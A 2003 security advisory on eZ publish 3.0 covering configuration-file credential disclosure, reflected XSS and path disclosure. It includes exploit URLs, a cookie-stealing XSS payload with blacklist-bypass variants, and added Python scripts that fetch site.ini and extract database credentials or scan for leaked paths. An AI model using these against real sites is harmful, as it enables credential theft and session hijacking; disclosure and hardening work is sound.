[UNIX] Multiple Vulnerabilities in Ez Publish

From: support@securiteam.com
Date: 04/18/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Apr 2003 11:29:50 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Multiple Vulnerabilities in Ez Publish
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.ez.no/> eZ publish 3 is "an open source content management
    system and development framework". Three classes of vulnerability have
    been found in the product: sensitive information disclosure, cross-site
    scripting, and path disclosure.

    DETAILS

    Vulnerable systems:
     * Ez Publish version 3.0 and prior

    Sensitive information disclosure:
    The settings directory of an eZ publish installation sits inside the web
    root and its .ini files are served as static content, so a remote attacker
    can read the site configuration, including the database server, user name
    and password, with a single unauthenticated HTTP GET request.

    No authentication or special tooling is needed: the attacker simply
    requests the file by its URL.

    For example, an attacker can download settings/site.ini and obtain
    information such as the following:
    ---- site.ini -----

    [DatabaseSettings]
    DatabasePluginPath=
    # Use either ezmysql or ezpostgresql
    DatabaseImplementation=ezmysql
    Server=localhost
    User=nextgen
    Password=nextgen
    Database=nextgen
    # Enable slave servers
    # The slave servers will only be used for read queries
    # Useful for load balanced environments
    UseSlaveServer=disabled
    #SlaveServerArray[]=localhost
    #SlaverServerUser[]=nextgen
    #SlaverServerPassword[]=nextgen
    #SlaverServerDatabase[]=nextgen
    # The number of times to reconnect if the first fails
    ConnectRetries=0
    Charset=iso-8859-1
    # Use charset conversion routines in DB if possible
    UseBuiltinEncoding=true
    Socket=disabled
    SQLOutput=disabled
    UsePersistentConnection=disabled

    [SiteSettings]
    # Name of the site, will be used in default templates in titles.
    SiteName=eZ publish
    # URL of site, often used to link to site in emails etc.
    SiteURL=mysite.com
    # List of metadata to set in pagelayout
    MetaDataArray[author]=eZ systems
    MetaDataArray[copyright]=eZ systems
    MetaDataArray[description]=Content Management System
    MetaDataArray[keywords]=cms, publish, e-commerce, content management
    Dir=
    # Which page to show when the root index (/) is accessed
    IndexPage=/content/view/sitemap/2/
    # What to do when a module does not exists, use either defaultpage or
    # displayerror
    ErrorHandler=displayerror
    # Displayed if an error occurs and ErrorHandler is set to defaultpage
    DefaultPage=/content/view/sitemap/2/
    # Default access is needed when uri type matching is done, this is
    # because with empty urls it's not possible to fetch the access
    DefaultAccess=demo
    # How the login page should be handled, use embedded to show inside default
    # pagelayout
    # or custom for loginpagelayout.tpl
    LoginPage=custom
    # The SSL port, the default should be OK for most sites but can be
    # changed if different. If the port is detect all redirects will
    # be done with https protocol.
    SSLPort=443

    -------------------
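The following is an added example, not code from the advisory or from eZ systems. It implements a parser for the ini dialect shown in the excerpt above (sections in brackets, key=value pairs, '#' comments), pulls the [DatabaseSettings] fields out of a retrieved site.ini, and wraps that in a check that requests the advisory's exploit URL, http://[target]/settings/site.ini. The sample ini text is a constructed fragment of the excerpt so the parser runs offline; the base URL passed to check_target() is supplied by the caller.

```python
"""Check a host for the settings/site.ini disclosure and pull the database
credentials out of the retrieved file.

Added example, not code from the advisory or from eZ systems. The ini grammar
implemented here (sections in [brackets], key=value pairs, '#' comments) is
taken from the site.ini excerpt in the advisory; SAMPLE_SITE_INI is a
constructed fragment of that excerpt so the parser can run offline."""
import re
import sys
import urllib.request
from urllib.error import URLError

# Constructed sample, reduced from the advisory's excerpt.
SAMPLE_SITE_INI = """\
[DatabaseSettings]
DatabasePluginPath=
# Use either ezmysql or ezpostgresql
DatabaseImplementation=ezmysql
Server=localhost
User=nextgen
Password=nextgen
Database=nextgen
UseSlaveServer=disabled
#SlaveServerArray[]=localhost

[SiteSettings]
SiteName=eZ publish
SiteURL=mysite.com
"""

CREDENTIAL_KEYS = ("DatabaseImplementation", "Server", "User", "Password", "Database")


def parse_ini(text):
    """Parse eZ publish's ini dialect into {section: {key: value}}.

    Blank lines and '#' comments are ignored, a key may carry an empty value
    (DatabasePluginPath=), and a line without '=' is skipped instead of
    aborting the parse, so a comment that was wrapped onto a second line
    does not break credential extraction."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+?)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    return sections


def looks_like_site_ini(body):
    """Distinguish a served site.ini from an error page or a redirect body."""
    return "DatabaseSettings" in parse_ini(body)


def extract_db_credentials(text):
    """Return the database fields an attacker would harvest, or None if the
    text is not a site.ini at all."""
    if not looks_like_site_ini(text):
        return None
    db = parse_ini(text)["DatabaseSettings"]
    return {key: db.get(key, "") for key in CREDENTIAL_KEYS}


def check_target(base_url, timeout=10):
    """Request http://[target]/settings/site.ini, the advisory's exploit URL,
    and return the disclosed credentials or None. base_url (for example
    "http://www.example.com") is supplied by the caller; this is the only
    function that touches the network."""
    url = base_url.rstrip("/") + "/settings/site.ini"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            body = response.read().decode("iso-8859-1", errors="replace")
    except URLError:
        return None
    return extract_db_credentials(body)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = check_target(target) if target else extract_db_credentials(SAMPLE_SITE_INI)
    print("no site.ini disclosed" if result is None else result)
```

Run with a base URL as the only argument to test a host; without arguments it parses the embedded sample. A 404, a redirect to a login page or an HTML error body all yield None because looks_like_site_ini() requires a real [DatabaseSettings] section rather than just a 200 status.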

    Cross Site Scripting:
    Several reflected cross-site scripting bugs were found in eZ publish: the
    values of request parameters such as SearchText, and even parts of the
    request path, are echoed back into the page without HTML encoding, so
    script embedded in a specially crafted URL runs in the browser of any
    user who follows the link, in the security context of the vulnerable
    site.

    The problem is present in many sections of the site. An attacker can
    distribute crafted links carrying arbitrary script, for instance to
    read the victim's session cookie.

    Path Disclosure:
    Numerous scripts under the kernel directory are not meant to be invoked
    directly. Requesting one of them by URL makes PHP raise an error whose
    message contains the script's absolute filesystem path.

    This lets a remote user learn the full path to the web root and other
    potentially useful details about the server layout, which helps in
    preparing further attacks. The vulnerability is triggered by a plain
    unauthenticated HTTP request for the affected file.

    Exploits:
    Sensitive information disclosure:
    http://[target]/settings/[file_name]

    For example:
    http://[target]/settings/site.ini

    Cross Site Scripting:
    http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
    http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&PhraseSearchText=[hostile_code]&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
    http://[target]/index.php/[any_section]/">[hostile_code]<
    http://[target]/index.php/"><script>[hostile_code]<

    The hostile code could be:
    [script]alert("Cookie="+document.cookie)[/script]
    (opens a window showing the visitor's cookie; replace [ ] with < >)

    Path Disclosure:
    Numerous files of the kernel directory are affected.
    http://[target]/kernel/class/delete.php
    http://[target]/kernel/class/edit.php
    http://[target]/kernel/class/ezcontentclassfeature.php
    http://[target]/kernel/class/groupedit.php
    http://[target]/kernel/class/grouplist.php
    http://[target]/kernel/class/list.php
    http://[target]/kernel/class/removeclass.php
    http://[target]/kernel/class/removegroup.php
    http://[target]/kernel/class/classlist.php
    http://[target]/kernel/class/copy.php
    http://[target]/kernel/classes/ezorderitem.php
    http://[target]/kernel/classes/ezpersistentobject.php
    http://[target]/kernel/classes/ezpolicy.php
    http://[target]/kernel/classes/ezpolicylimitation.php
    http://[target]/kernel/classes/ezpolicylimitationvalue.php
    http://[target]/kernel/classes/ezproductcollection.php
    http://[target]/kernel/classes/ezproductcollectionitem.php
    http://[target]/kernel/classes/ezproductcollectionitemoption.php
    http://[target]/kernel/classes/ezrole.php
    http://[target]/kernel/classes/ezsearch.php
    http://[target]/kernel/classes/ezsearchlog.php
    ..

    Workarounds:
    Cross Site Scripting:
    Filter user input, for example with the PHP function eregi_replace. Note
    that a blacklist of this kind only removes the patterns it knows about,
    and the ereg family of functions is deprecated in later PHP versions; the
    robust fix is to HTML-encode every value at the point where it is written
    into the page (htmlspecialchars with ENT_QUOTES), so that the input cannot
    terminate the attribute or tag it is printed into.
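The block below is an added example illustrating both the reflected XSS described under DETAILS and the eregi_replace workaround above; it is not eZ publish's template code. TEMPLATE stands in for the search form that echoes SearchText back into the page, render_blacklist() mimics a script-tag filter of the kind eregi_replace would implement, and render_escaped() is the output-encoding fix. The payloads are constructed: the first is the advisory's own hostile code with [] replaced by <>, the other two carry the same effect past the blacklist.

```python
"""The reflected XSS from the advisory and the difference between filtering
input and encoding output.

Added example, not eZ publish's template code. TEMPLATE is a stand-in for the
search form that echoes SearchText back into the page; render_blacklist()
mimics the eregi_replace() workaround the advisory suggests, and
render_escaped() is the hardened form. The payloads are constructed: the first
is the advisory's own hostile code with [] replaced by <>."""
import html
import re

TEMPLATE = '<input type="text" name="SearchText" value="{value}">'

PAYLOAD_SCRIPT = '"><script>alert("Cookie="+document.cookie)</script>'
# No <script> tag at all: closes the attribute and opens an element with an
# event handler, so a <script> blacklist never sees anything to remove.
PAYLOAD_EVENT = '"><img src=x onerror=alert(document.cookie)>'
# Classic blacklist bypass: removing the inner <script> reassembles the outer.
PAYLOAD_NESTED = '"><scr<script>ipt>alert(document.cookie)</script>'


def render_unsafe(search_text):
    """Vulnerable pattern: request input copied into the page untouched."""
    return TEMPLATE.format(value=search_text)


def render_blacklist(search_text):
    """Filtering in the style of eregi_replace('<script>', '', $input):
    strips <script> and </script> tags case-insensitively, nothing else."""
    cleaned = re.sub(r"</?script[^>]*>", "", search_text, flags=re.IGNORECASE)
    return TEMPLATE.format(value=cleaned)


def render_escaped(search_text):
    """Output encoding: <, >, &, " and ' become entities, so the input can
    never terminate the attribute it is printed into. In PHP this is
    htmlspecialchars($input, ENT_QUOTES) at the point of output."""
    return TEMPLATE.format(value=html.escape(search_text, quote=True))


def breaks_out_of_attribute(rendered):
    """Oracle used below: the template contains exactly one element, so any
    second tag opener in the rendered HTML means the input escaped value=""
    and injected markup of its own."""
    return len(re.findall(r"<[A-Za-z]", rendered)) > 1


def evaluate(payloads=(PAYLOAD_SCRIPT, PAYLOAD_EVENT, PAYLOAD_NESTED)):
    """For each payload, report which renderer still lets markup through."""
    renderers = {"unsafe": render_unsafe, "blacklist": render_blacklist,
                 "escaped": render_escaped}
    return {p: {name: breaks_out_of_attribute(fn(p)) for name, fn in renderers.items()}
            for p in payloads}


if __name__ == "__main__":
    for payload, outcome in evaluate().items():
        print(payload)
        for name, injected in outcome.items():
            print(f"  {name:9s} {'INJECTED' if injected else 'contained'}")
```

The blacklist stops only the payload it was written for; the event-handler and nested variants go straight through it, while html.escape() contains all three because it changes the characters that carry HTML meaning rather than looking for particular tag names.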

    Path Disclosure:
    You can hide the path disclosure by adding the following code at the top
    of all the affected files:

    -------CUT-------

    error_reporting(0);

    -------CUT-------

    This only suppresses the error messages; the scripts can still be
    requested directly. Denying web access to the kernel and settings
    directories in the web server configuration removes both the path
    disclosure and the site.ini disclosure at the source.
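The following is an added example for the path disclosure; it is not code from the advisory or from eZ publish. It matches PHP error messages in response bodies for the kernel/ URLs listed above, extracts the absolute path, and infers the document root from the URL path that was requested. The sample bodies are constructed in the shape of PHP 4 warning and fatal error output with display_errors and html_errors on; the regex also accepts the plain-text form used when html_errors is off. Which error a given script raises depends on the installation, which is why the function takes any response body rather than a fixed message.

```python
"""Detect the kernel/ path disclosure in HTTP response bodies and work back to
the document root.

Added example, not code from the advisory or eZ publish. The sample bodies are
constructed in the shape of PHP 4 warning and fatal error output with
display_errors and html_errors on; the regex also accepts the plain-text form
written when html_errors is off."""
import re

# Level, message, "in <path> on line <n>", with or without the <b> markup.
PHP_ERROR_RE = re.compile(
    r"(?:<b>)?(?P<level>Warning|Fatal error|Notice|Parse error)(?:</b>)?:\s*"
    r"(?P<msg>.*?)\s+in\s+(?:<b>)?(?P<path>(?:/|[A-Za-z]:\\)[^<\s]+)(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.DOTALL,
)

# A subset of the kernel/ scripts listed in the advisory.
KERNEL_PATHS = ("/kernel/class/list.php", "/kernel/classes/ezrole.php")

# Constructed responses, not captured from a real host.
SAMPLE_FATAL = (
    "<br>\n<b>Fatal error</b>:  Call to undefined function:  ezdebug() in "
    "<b>/home/httpd/html/ezpublish/kernel/class/list.php</b> on line <b>42</b><br>\n"
)
SAMPLE_WARNING = (
    "<br>\n<b>Warning</b>:  main(lib/ezutils/classes/ezdebug.php): failed to open "
    "stream: No such file or directory in "
    "<b>/var/www/ezpublish/kernel/classes/ezrole.php</b> on line <b>35</b><br>\n"
)
SAMPLE_CLEAN = "<html><body><h1>Not Found</h1></body></html>"


def find_disclosed_paths(body):
    """Return [(level, absolute_path, line)] for every PHP error in body that
    reveals a filesystem path; [] for a body that discloses nothing."""
    return [(m.group("level"), m.group("path"), int(m.group("line")))
            for m in PHP_ERROR_RE.finditer(body)]


def webroot_from_path(disclosed_path, url_path):
    """Infer the document root by removing the requested URL path from the end
    of the disclosed absolute path (Unix separators only). Returns None when
    the two do not line up, e.g. the error came from an included file."""
    if disclosed_path.endswith(url_path):
        return disclosed_path[: -len(url_path)] or "/"
    return None


def scan_bodies(responses):
    """responses maps a requested URL path to its response body (the caller
    fetches the kernel/ URLs from the advisory). Returns, per URL path that
    leaked, the findings plus the inferred web root if any."""
    report = {}
    for url_path, body in responses.items():
        hits = find_disclosed_paths(body)
        if not hits:
            continue
        roots = {webroot_from_path(p, url_path) for _, p, _ in hits} - {None}
        report[url_path] = {"errors": hits, "webroot": next(iter(roots), None)}
    return report


if __name__ == "__main__":
    demo = {KERNEL_PATHS[0]: SAMPLE_FATAL, KERNEL_PATHS[1]: SAMPLE_WARNING,
            "/kernel/class/edit.php": SAMPLE_CLEAN}
    for url_path, finding in scan_bodies(demo).items():
        print(url_path, "->", finding["webroot"], finding["errors"])
```

Feed scan_bodies() the bodies returned for the kernel/ URLs and it reports, per URL, which error leaked and the web root it implies. After the error_reporting(0) workaround the same requests return empty bodies and the scanner reports nothing, which is the check to run after applying it; it does not tell you whether the scripts are still reachable.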

    Vendor status:
    The vendor has been notified.

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    http://www.security-corporation.com/index.php?id=advisories&a=016

    The original French advisory can be found at:
    http://www.security-corporation.com/index.php?id=advisories&a=016-FR

    The information has been provided by Gregory Le Bras
    <gregory.lebras@security-corporation.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

